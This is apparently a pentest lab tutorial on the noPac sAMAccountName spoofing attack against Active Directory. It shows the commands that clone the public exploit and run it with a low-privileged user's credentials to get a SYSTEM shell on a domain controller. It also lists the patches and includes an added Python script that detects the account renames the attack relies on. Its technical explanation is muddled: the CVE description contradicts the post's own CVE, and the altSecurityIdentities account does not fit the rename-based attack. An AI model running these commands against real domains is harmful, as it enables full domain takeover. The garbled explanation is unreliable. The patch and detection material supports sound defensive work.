Windows Privilege Escalation: sAMAccountName Spoofing
This post discusses how CVE-2021-42278 allows an attacker to obtain highly privileged access (Administrator-level access on the domain controller) starting from a low-privileged account (any normal domain user).
Description: Active Directory Domain Services Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.
Release Date: Nov 9, 2021
Impact: Elevation of Privilege
Severity: Important
CVSS score: 8.8
Pentest Lab setup
In our lab setup, a Kali VM is the attacker machine and a Windows domain controller (running on a vulnerable Windows build) is the target. This domain controller has not been patched since November 9, 2021, which leaves it vulnerable to exploitation.
Next, we create a user with normal domain user privileges in the test Domain Controller. This step simulates the low-privileged starting position of the attack.
To check the user's details on the Domain Controller, run the following command. The output shows that the account is a normal domain user, confirming its privilege level.
net user sakshi
Exploitation
On the attacker system (the Kali VM), clone the exploit from the Git repository below.
git clone https://github.com/Ridter/noPac
After cloning the repository https://github.com/Ridter/noPac, change into the noPac directory and list its contents:
cd noPac
ls -al
Then execute the command:
python3 noPac.py ignite.local/sakshi:'Password@1' -dc-ip 192.168.1.182 -shell --impersonate administrator -use-ldap
This CVE represents a security bypass vulnerability caused by Kerberos PAC confusion and the impersonation of domain controllers.
It allows an attacker to impersonate domain controllers by requesting TGTs from Kerberos without a PAC. Consequently, the attacker impersonates a highly privileged user as soon as Kerberos issues the TGT without a PAC.
To achieve this, the "altSecurityIdentities" attribute is configured so that the domain controller adds a PAC when it receives a service ticket (ST) request made with a TGT that has no PAC.
This process involves modifying the altSecurityIdentities attribute of an account in a foreign domain to Kerberos:[samaccountname]@[domain] in order to impersonate that user.
As a result, the command output on the attacker machine (Kali VM) shows that the shell has acquired "NT AUTHORITY\SYSTEM" privileges.
Mitigation
KB5008602 – https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7
KB5008380 – https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041
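Beyond applying the patches above, defenders can watch for the account rename the attack depends on: a computer account whose sAMAccountName loses its trailing "$" or is changed to match a domain controller's name. The following Python script is an added example written for this post; it is not part of the original article or of the noPac project. It scans Windows Security event records of type 4781 ("The name of an account was changed") and 4742 ("A computer account was changed") for that pattern. The event records are constructed sample data whose keys mirror the named fields of those events, and the list of domain controller names is an assumption for an example domain.

```python
"""Detection helper for sAMAccountName spoofing (CVE-2021-42278 / CVE-2021-42287).

Added example, not code from the original post or the noPac project. It flags
renames that match the attack's preparation step: a computer account renamed
to a name without a trailing '$', or renamed to collide with a domain
controller's name. Event records below are constructed sample data.
"""

# Assumption for the example domain: sAMAccountNames of the domain controllers.
KNOWN_DC_NAMES = {"DC01$"}

# Constructed sample Security event records. Keys mirror the event fields:
# 4781 carries OldTargetUserName / NewTargetUserName, 4742 carries the
# target computer (TargetUserName) and the new "SAM Account Name" value,
# or "-" when that attribute did not change.
SAMPLE_EVENTS = [
    {"EventID": 4781, "SubjectUserName": "sakshi", "OldTargetUserName": "WS01$",
     "NewTargetUserName": "DC01"},
    {"EventID": 4781, "SubjectUserName": "helpdesk", "OldTargetUserName": "jdoe",
     "NewTargetUserName": "john.doe"},
    {"EventID": 4742, "SubjectUserName": "svc_join", "TargetUserName": "WS02$",
     "SamAccountName": "-"},
    {"EventID": 4742, "SubjectUserName": "sakshi", "TargetUserName": "WS04$",
     "SamAccountName": "PRINTSRV"},
    {"EventID": 4781, "SubjectUserName": "admin", "OldTargetUserName": "WS03$",
     "NewTargetUserName": "WS03-OLD$"},
]


def is_computer_name(name: str) -> bool:
    """Computer accounts carry a trailing '$' in their sAMAccountName."""
    return name.endswith("$")


def analyse_rename(old: str, new: str, known_dcs=KNOWN_DC_NAMES):
    """Return the reasons a rename looks like sAMAccountName spoofing (empty if none)."""
    reasons = []
    if is_computer_name(old) and not is_computer_name(new):
        reasons.append("computer account renamed to a name without a trailing '$'")
    dc_base_names = {dc.rstrip("$").lower() for dc in known_dcs}
    real_dc_names = {dc.lower() for dc in known_dcs}
    # A new name equal to a DC name minus its '$' is the spoofing pattern;
    # the exact DC name itself cannot be reused, so it is not flagged here.
    if new.rstrip("$").lower() in dc_base_names and new.lower() not in real_dc_names:
        reasons.append("new name collides with a domain controller name")
    return reasons


def scan_events(events, known_dcs=KNOWN_DC_NAMES):
    """Scan 4781/4742 records and return one finding per suspicious rename."""
    findings = []
    for ev in events:
        event_id = ev.get("EventID")
        if event_id == 4781:
            old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
        elif event_id == 4742:
            new = ev.get("SamAccountName", "-")
            if new == "-":
                continue  # sAMAccountName attribute was not part of the change
            old = ev["TargetUserName"]
        else:
            continue  # other event types are not relevant to this check
        reasons = analyse_rename(old, new, known_dcs)
        if reasons:
            findings.append({
                "event_id": event_id,
                "changed_by": ev.get("SubjectUserName", "?"),
                "old_name": old,
                "new_name": new,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(f"[{finding['event_id']}] {finding['old_name']} -> {finding['new_name']} "
              f"by {finding['changed_by']}: {'; '.join(finding['reasons'])}")
```

On the constructed sample, two of the five records are flagged: the rename of WS01$ to DC01 (both the missing "$" and the collision with the DC name) and the 4742 change that sets a computer's sAMAccountName to PRINTSRV. In production the records would come from the domain controllers' Security logs, and the DC name set from the Domain Controllers OU.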
References:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42287
Author details: Amit Kishor has more than 10 years of network security experience, with expertise in multiple firewall products as well as SaaS products. Contact on LinkedIn.